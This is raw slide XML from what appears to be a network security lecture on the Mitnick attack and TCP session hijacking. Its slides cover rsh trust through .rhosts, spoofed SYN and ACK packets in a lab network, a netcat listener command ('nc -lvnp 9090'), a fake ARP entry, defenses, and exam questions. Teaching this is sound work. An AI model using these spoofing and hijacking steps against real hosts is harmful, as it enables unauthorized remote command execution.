                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EF6CDFB-8D4A-22AE-FE25-27FD851B6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83" y="1300761"/>
            <a:ext cx="1394757" cy="17208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1BAFC31-329D-CE32-F274-D3195B1AD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492" y="1300760"/>
            <a:ext cx="1108718" cy="156138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F7AF205-34AC-C141-5ADF-06BF86119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284" y="3543300"/>
            <a:ext cx="1969433" cy="1340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218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4591-7B56-9F0C-8DDC-642AA8CDBB8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 Simplified Mitnick Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA4719E-3367-24F4-5943-BF61E0FEB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1" y="3600450"/>
            <a:ext cx="1717490" cy="1168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shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EBFFC5-F93D-5F34-67CF-992E7C660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0" y="1646664"/>
            <a:ext cx="1250411" cy="1059171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA240355-5211-797B-5BAC-0F1BE4C9B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549" y="1641667"/>
            <a:ext cx="824356" cy="1064168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CBD2BAC-D61F-56B4-F6F4-55F02EB17C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967771" y="2752796"/>
            <a:ext cx="1156086" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10.9.0.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31C10A3-7BA1-7414-E1F3-2118E04FA1B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6072042" y="2788421"/>
            <a:ext cx="1156086" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10.9.0.6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13E52B1F-6C50-6AB2-682F-A8CFC07421A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1254249"/>
            <a:ext cx="3733800" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lnvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 9090 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2289649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2DB4-C064-6FAF-DFA0-FC2DADD3E50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Spoofing SYN Packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7920180F-E341-ACBC-B728-DB98061C3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371600"/>
            <a:ext cx="5179942" cy="2607833"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1311780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9D03-221F-8407-EF9B-EBA565FCD9F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Shutdown the Client: Emulation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56972EE9-B72F-2590-6626-A67053D6BB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943100"/>
            <a:ext cx="6337391" cy="800212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254145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344E-93EA-222B-E7C3-6CEC06458C3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Spoofing ACK and Data (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87D1029-6539-A0E6-977C-B72A6553CF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257301"/>
            <a:ext cx="7494840" cy="2965070"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150328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ECA2-2579-2204-741E-38155524235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Spoofing ACK and Data (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Graphical user interface, text, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{063A1154-32A1-89A9-0D03-B57FD23503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314451"/>
            <a:ext cx="7551998" cy="3136544"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3323880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11C9-1631-EB39-616D-6FC951079B3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Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5F4CD7-616A-E150-74A6-4D881EC01D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1" y="1072624"/>
            <a:ext cx="7529000" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2821339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The Behavior of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rsh</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369219"/>
            <a:ext cx="7886700" cy="3578338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> server program uses two files for authentication, </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rhosts</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etc</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hosts.equiv</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Every time the server receives a remote command request, it will check the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hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. If the request comes from a hostname stored in the file, the server will accept it without asking for password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If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hosts.equiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> does not exist or do not have that hostname, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> will check the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file in the user’s home directory</a:t>
            </a:r>
          </a:p>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rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file must reside at the top level of a user’s home directory and can be written only by the owner/user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 644 .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rhosts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494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Silencing the Trusted Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1369219"/>
            <a:ext cx="7886700" cy="3578338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We can manually stop the trusted server container, but that is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Since the trusted server has been muted, no one is going to answer the ARP request sent by the X-Terminal, hence the X-Terminal cannot send out the response. As a result, the TCP connection will not be established</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To simply your attack, you can run the following command on X-Terminal to permanently add an entry to the ARP cache for 10.9.0.6 (trusted server). We can use a fake MAC address</a:t>
            </a:r>
          </a:p>
          <a:p>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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -s 10.9.0.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aa:bb:cc:dd:ee:ff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980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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If two programs on the same machine send data to the same TCP server on another machine, will the server mix their data? What if the server is a UDP server?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="960279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The Behavior of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rsh</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799" y="1268016"/>
            <a:ext cx="6571933" cy="3701313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3765665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The Behavior of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rsh</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On the X-terminal (10.0.2.129), add Trusted Server’s IP 10.0.2.128 to the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>On Trusted Server, run </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rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 10.0.2.129 date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Command format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1022\x00seed\x00seed\x00date\x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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62" y="2907849"/>
            <a:ext cx="8550876" cy="45759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 y="3568395"/>
            <a:ext cx="6839000" cy="1314460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381619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The Second Connection and Executing the Command</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The X-terminal will initiate a second TCP connection for handling error</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Executing the command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="91051" y="2394950"/>
            <a:ext cx="8961897" cy="353599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="449361" y="3845137"/>
            <a:ext cx="7882811" cy="402371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1779913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Against Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Making it difficult for attackers to spoof packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomize source port number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomize initial sequence number </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not effective against local attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" indent="-284163">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="346075" indent="-346075">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypting payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3224382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pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If TCP always uses a ﬁxed sequence number (e.g., zero) in its SYN + ACK packet during the three-way hand shake protocol, please describe how you can conduct a denial of-service attack on the TCP server. Your objective is different from the SYN ﬂooding attack; you want to cause the server to establish connections with many non-existing computers, and thus exhausting the server’s resources, especially its memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UDP services can be used for ampliﬁcation attacks. Why cannot TCP be used for the same attack? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2040845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284163" indent="-284163"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How TCP works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
